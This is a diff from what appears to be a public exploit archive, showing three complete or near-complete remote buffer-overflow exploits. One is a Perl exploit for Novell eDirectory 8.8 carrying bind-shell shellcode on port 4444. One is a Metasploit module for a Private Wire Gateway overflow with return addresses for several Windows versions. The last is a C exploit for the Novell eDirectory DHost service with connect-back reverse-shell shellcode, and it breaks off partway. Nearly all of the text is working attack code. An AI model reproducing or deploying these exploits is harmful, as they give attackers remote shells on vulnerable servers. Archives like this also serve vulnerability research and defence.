+# 0x00, 0x0a, 0x0d, 0x3a free shellcode
+#
+# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+#
+$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+     "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+     "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+     "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+     "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
+     "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
+     "\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57".
+     "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48".
+     "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38".
+     "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c".
+     "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+     "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48".
+     "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
+     "\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38".
+     "\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d".
+     "\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58".
+     "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36".
+     "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
+     "\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47".
+     "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
+     "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
+     "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30".
+     "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
+     "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54".
+     "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
+     "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a".
+     "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41".
+     "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42".
+     "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
+     "\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d".
+     "\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
+     "\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45".
+     "\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36".
+     "\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c".
+     "\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c".
+     "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52".
+     "\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
+     "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
+     "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46".
+     "\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46".
+     "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56".
+     "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
+     "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
+     "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d".
+     "\x4f\x4f\x42\x4d\x5a";
+
+print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n";
+
+$sock = IO::Socket::INET->new
+(
+
+   PeerAddr => $ip,
+   PeerPort => $port,
+   Proto    => 'tcp',
+   Timeout  => 2
+
+) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
+
+print "[+] Connected.\n";
+print "[+] Trying to overwrite RETurn address...\n";
+
+$sock->send( "GET /nds HTTP/1.1\r\n" );
+$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" );
+
+print "[+] Done. Now check for bind shell on $ip:4444!";
+
+close( $sock );
+
+# milw0rm.com [2006-10-28]
diff --git a/platforms/windows/remote/268.c b/platforms/windows/remote/268.c
index 3f2821ef8..189ecfecb 100755
--- a/platforms/windows/remote/268.c
+++ b/platforms/windows/remote/268.c
@@ -164,6 +164,6 @@ unsigned char sploit[]=
   printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
   exit(0);
 }  
-
-
-// milw0rm.com [2001-05-08]
+
+
+// milw0rm.com [2001-05-08]
diff --git a/platforms/windows/remote/2680.pm b/platforms/windows/remote/2680.pm
index de9e699c1..d3588db6c 100755
--- a/platforms/windows/remote/2680.pm
+++ b/platforms/windows/remote/2680.pm
@@ -1,124 +1,124 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-##
-# From the author:
-# This file may only be distributed as part of the Metasploit Framework.
-# Any other use needs a written permission from the author.
-##
-
-package Msf::Exploit::privatewire_gateway_win32;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'  => 'Private Wire Gateway Buffer Overflow (win32)',
-	'Version'  => '$Rev$',
-	'Authors' =>
-	  [
-		'Michael Thumann  ',
-	  ],
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32' ],
-	'Priv'  => 1,
-
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 80],
-		'PATH'  => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],
-	  },
-
-	'Payload' =>
-	  {
-		'Space'    => 8000,
-		'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
-		'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-        This exploits a buffer overflow in the ADMCREG.EXE used
-        in the PrivateWire Online Registration Facility. .
-}),
-
-	'Refs'  =>
-	  [
-		['BID', '18647'],
-	  ],
-
-	'DefaultTarget' => 4,
-	'Targets' => [
-		['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL
-		['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL
-		['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL
-		['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL
-		['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL
-		['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL
-		['Debugging', 0x41414141], # Crash
-	  ],
-
-	'Keys' => ['privatewire'],
-
-	'DisclosureDate' => 'June 26 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $path        = $self->GetVar('PATH');
-	my $path_offset = length($path)-8;
-
-	my $target = $self->Targets->[$target_idx];
-
-	my $pattern = Pex::Text::AlphaNumText(8192);
-	my $jmp = # add 25 to ecx and jmp
-	  "\x6a\x19".
-	  "\x58".
-	  "\x01\xc1".
-	  "\xff\xe1";
-	substr($pattern, 0, length($shellcode), $shellcode);
-	substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));
-	substr($pattern, 8160, length($jmp), $jmp);
-
-	my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";
-
-	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$s->Send($request);
-	$s->Close();
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-10-29]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+##
+# From the author:
+# This file may only be distributed as part of the Metasploit Framework.
+# Any other use needs a written permission from the author.
+##
+
+package Msf::Exploit::privatewire_gateway_win32;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'  => 'Private Wire Gateway Buffer Overflow (win32)',
+	'Version'  => '$Rev$',
+	'Authors' =>
+	  [
+		'Michael Thumann  ',
+	  ],
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32' ],
+	'Priv'  => 1,
+
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 80],
+		'PATH'  => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],
+	  },
+
+	'Payload' =>
+	  {
+		'Space'    => 8000,
+		'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
+		'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+        This exploits a buffer overflow in the ADMCREG.EXE used
+        in the PrivateWire Online Registration Facility. .
+}),
+
+	'Refs'  =>
+	  [
+		['BID', '18647'],
+	  ],
+
+	'DefaultTarget' => 4,
+	'Targets' => [
+		['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL
+		['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL
+		['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL
+		['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL
+		['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL
+		['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL
+		['Debugging', 0x41414141], # Crash
+	  ],
+
+	'Keys' => ['privatewire'],
+
+	'DisclosureDate' => 'June 26 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $path        = $self->GetVar('PATH');
+	my $path_offset = length($path)-8;
+
+	my $target = $self->Targets->[$target_idx];
+
+	my $pattern = Pex::Text::AlphaNumText(8192);
+	my $jmp = # add 25 to ecx and jmp
+	  "\x6a\x19".
+	  "\x58".
+	  "\x01\xc1".
+	  "\xff\xe1";
+	substr($pattern, 0, length($shellcode), $shellcode);
+	substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));
+	substr($pattern, 8160, length($jmp), $jmp);
+
+	my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";
+
+	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$s->Send($request);
+	$s->Close();
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-10-29]
diff --git a/platforms/windows/remote/2689.c b/platforms/windows/remote/2689.c
index 20cc5b5d2..e859284c9 100755
--- a/platforms/windows/remote/2689.c
+++ b/platforms/windows/remote/2689.c
@@ -1,225 +1,225 @@
-/*
-       _______         ________           .__        _____          __
-___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
-\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
- >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
-/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
-      \/      \/     \/       \/   30\10\06    \/      |__|      \/     \/
-      
- *   mm.           dM8
- *  YMMMb.       dMM8      _____________________________________
- *   YMMMMb     dMMM'     [                                     ]
- *    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
- *      `YMMM  MMM'       [ windows I have yet to look through  ]
- *         "MbdMP         [ Going forward may not be the answer ]
- *     .dMMMMMM.P         [                                     ]
- *    dMM  MMMMMM         [       maybe I should go back        ]
- *    8MMMMMMMMMMI        [_____________________________________]
- *     YMMMMMMMMM                   www.netbunny.org
- *       "MMMMMMP
- *      MxM .mmm
- *      W"W """
- 
-
-[i] Title:              Novell eDirectory <= 9.0 DHost Buffer overflow exploit
-[i] Discovered by:      Novell
-[i] Original code by:   FistFuXXer
-[i] Exploit by:         Expanders
-[i] Filename:           XHNB-Novell-eDirectory_remote_bof.c
-[i] References:         http://www.novell.com/
-[i] Greatings:          x0n3-h4ck - netbunny
-
-[ Research diary ]
-
-After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting
-method.  This exploit overwrite the Second Exception Handler to take control of the program flow.
-
-[ Special thanks ]
-
-FistFuXXer
-H D Moore
-
-[ Links ]
-
-www.x0n3-h4ck.org
-www.netbunny.org
-
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#define BUFFSIZE 1000 // Buffer size
-#define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called
-
-int banner();
-int usage(char *filename);
-int inject(char *port, char *ip);
-int remote_connect( char* ip, unsigned short port );
-
-
-char attack[] =
-"GET /nds HTTP/1.1\r\n"
-"Host: %s\r\n\r\n";
-
-/* win32_reverse -  EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
-char shellcode[] =
-"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
-"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
-"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
-"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
-"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
-"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
-"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
-"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
-"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
-"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
-"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
-"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
-"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
-"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
-"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
-"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
-"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
-"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
-"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
-"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";
-
-char jmpback[]=
-//22 byte xor decoder (0x55)
-"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
-//(20 byte jump-back code -> 256 + 256 + 64 bytes)
-"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4";
-
-char jmpover[]=
-// 2 bytes jump 6 bytes over - 2 bytes NOP
-"\xEb\x06\x90\x90";
-
-struct retcodes{char *platform;unsigned long addr;} targets[]= {
-        { "eDirectory MFC42U.dll", 0x5f80bbf7 },
-        { "Windows NT SP 5/6"    , 0x776a1082 },   // ws2help.dll pop esi, pop ebx, retn  [Tnx to metasploit]
-	{ "Windows 2k Universal" , 0x750211a9 },   // ws2help.dll pop ebp, pop ebx, retn  [Tnx to metasploit]
-	{ "Windows XP Universal" , 0x71abe325 },   // ws2help.dll pop ebx, pop ebp, retn  [Tnx to metasploit]
-	{ NULL }
-};
-int banner() {
-  printf("\n       _______         ________           .__        _____          __     \n");
-  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
-  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
-  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
-  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
-  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
-  printf("[i] Title:        \tNovell eDirectory DHost Buffer overflow\n");
-  printf("[i] Perl Code by:\tFistFuXXer\n");
-  printf("[i] Exploit by:   \tExpanders\n\n");
-  return 0;
-}
-
-int usage(char *filename) {
-  int i;
-  printf("Usage: \t%s     \n\n",filename);
-  printf("       \t   : Victim's host\n");
-  printf("       \t   : Victim's port  ::  Default: 8028\n");
-  printf("       \t   : Local ip address for connectback\n");
-  printf("       \t : Local port for connectback\n");
-  printf("       \t   : Target from the list below\n\n");
-  
-  printf("#   \t Platform\n");
-  printf("-----------------------------------------------\n");
-  for(i = 0; targets[i].platform; i++)
-        printf("%d \t %s\n",i,targets[i].platform);
-  printf("-----------------------------------------------\n");
-  exit(0);
-}
-
-int inject(char *port, char *ip)
-{
-    unsigned long xorip;
-    unsigned short xorport;
-    xorip = inet_addr(ip)^(unsigned long)0x6F88613F;
-    xorport = htons(atoi( port ))^(unsigned short)0x6F88;
-    memcpy ( &shellcode[184], &xorip, 4);
-    memcpy ( &shellcode[190], &xorport, 2);
-    return 0;
-}
-
-int remote_connect( char* ip, unsigned short port )
-{
-  int s;
-  struct sockaddr_in remote_addr;
-  struct hostent* host_addr;
-
-  memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
-  if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
-  {
-   printf ( "[X] Cannot resolve \"%s\"\n", ip );
-   exit ( 1 );
-  }
-  remote_addr.sin_family = AF_INET;
-  remote_addr.sin_port = htons ( port );
-  remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
-  if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
-  {
-   printf ( "[X] Socket failed!\n" );
-   exit ( 1 );
-  }
-  if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
-  {
-   printf ( "[X] Failed connecting!\n" );
-   exit ( 1 );
-  }
-  return ( s );
-}
-
-int main(int argc, char *argv[]) {
-    int s,position;
-    unsigned int rcv;
-    char *buffer,*request;
-    char recvbuf[256];
-    banner();
-    if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
-        usage(argv[0]);
-    position = 0;
-    printf("[+] Creating evil buffer\n");
-    buffer = (char *) malloc(BUFFSIZE);
-    request = (char *) malloc(BUFFSIZE + strlen(attack)); //  +3 == \r + \n + 0x00
-    memset(buffer,0x90,BUFFSIZE);  // Fill with nops
-
-    inject(argv[4],argv[3]);     // Xor port and ip and put them into the shellcode
-    memset(buffer,0x41,68);      // First comes the ascii
-    position = 68;
-    memcpy(buffer+position,DEADRET,4);
-    position = 680 - (strlen(shellcode) + 100);   // 680 : Pointer to next Execption structure
-    memcpy(buffer+position,shellcode,strlen(shellcode));
-    position += strlen(shellcode)+100;
-    memcpy(buffer+position,jmpover,4); position += 4;
-    memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
-    position += 8; // 8 bytes more nops
-    memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
-    position += 8; // 8 bytes more nops
-    memset(buffer+position,0x00,1); // End
-
-
-    sprintf(request,attack,buffer);
-    printf("[+] Connecting to remote host\n");
-    s = remote_connect(argv[1],atoi(argv[2]));
-    sleep(1);
-    printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
-    if ( send ( s, request, strlen (request), 0) <= 0 )
-    {
-           printf("[X] Failed to send buffer\n");
-           exit ( 1 );
-    }
-    printf("[+] Done - Wait for shell on port %s\n",argv[4]);
-    close(s);
-    free(buffer);
-    buffer = NULL;
-    return 0;
-}
-
-// milw0rm.com [2006-10-30]
+/*
+       _______         ________           .__        _____          __
+___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
+\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
+ >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
+/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
+      \/      \/     \/       \/   30\10\06    \/      |__|      \/     \/
+      
+ *   mm.           dM8
+ *  YMMMb.       dMM8      _____________________________________
+ *   YMMMMb     dMMM'     [                                     ]
+ *    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
+ *      `YMMM  MMM'       [ windows I have yet to look through  ]
+ *         "MbdMP         [ Going forward may not be the answer ]
+ *     .dMMMMMM.P         [                                     ]
+ *    dMM  MMMMMM         [       maybe I should go back        ]
+ *    8MMMMMMMMMMI        [_____________________________________]
+ *     YMMMMMMMMM                   www.netbunny.org
+ *       "MMMMMMP
+ *      MxM .mmm
+ *      W"W """
+ 
+
+[i] Title:              Novell eDirectory <= 9.0 DHost Buffer overflow exploit
+[i] Discovered by:      Novell
+[i] Original code by:   FistFuXXer
+[i] Exploit by:         Expanders
+[i] Filename:           XHNB-Novell-eDirectory_remote_bof.c
+[i] References:         http://www.novell.com/
+[i] Greatings:          x0n3-h4ck - netbunny
+
+[ Research diary ]
+
+After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting
+method.  This exploit overwrite the Second Exception Handler to take control of the program flow.
+
+[ Special thanks ]
+
+FistFuXXer
+H D Moore
+
+[ Links ]
+
+www.x0n3-h4ck.org
+www.netbunny.org
+
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#define BUFFSIZE 1000 // Buffer size
+#define DEADRET "\xde\xc0\xad\xde" // this address cause the exception to be called
+
+int banner();
+int usage(char *filename);
+int inject(char *port, char *ip);
+int remote_connect( char* ip, unsigned short port );
+
+
+char attack[] =
+"GET /nds HTTP/1.1\r\n"
+"Host: %s\r\n\r\n";
+
+/* win32_reverse -  EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
+char shellcode[] =
+"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
+"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
+"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
+"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
+"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
+"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
+"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
+"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
+"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
+"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
+"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
+"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
+"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
+"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
+"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
+"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
+"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
+"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
+"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
+"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";
+
+char jmpback[]=
+//22 byte xor decoder (0x55)
+"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
+//(20 byte jump-back code -> 256 + 256 + 64 bytes)
+"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4";
+
+char jmpover[]=
+// 2 bytes jump 6 bytes over - 2 bytes NOP
+"\xEb\x06\x90\x90";
+
+struct retcodes{char *platform;unsigned long addr;} targets[]= {
+        { "eDirectory MFC42U.dll", 0x5f80bbf7 },
+        { "Windows NT SP 5/6"    , 0x776a1082 },   // ws2help.dll pop esi, pop ebx, retn  [Tnx to metasploit]
+	{ "Windows 2k Universal" , 0x750211a9 },   // ws2help.dll pop ebp, pop ebx, retn  [Tnx to metasploit]
+	{ "Windows XP Universal" , 0x71abe325 },   // ws2help.dll pop ebx, pop ebp, retn  [Tnx to metasploit]
+	{ NULL }
+};
+int banner() {
+  printf("\n       _______         ________           .__        _____          __     \n");
+  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
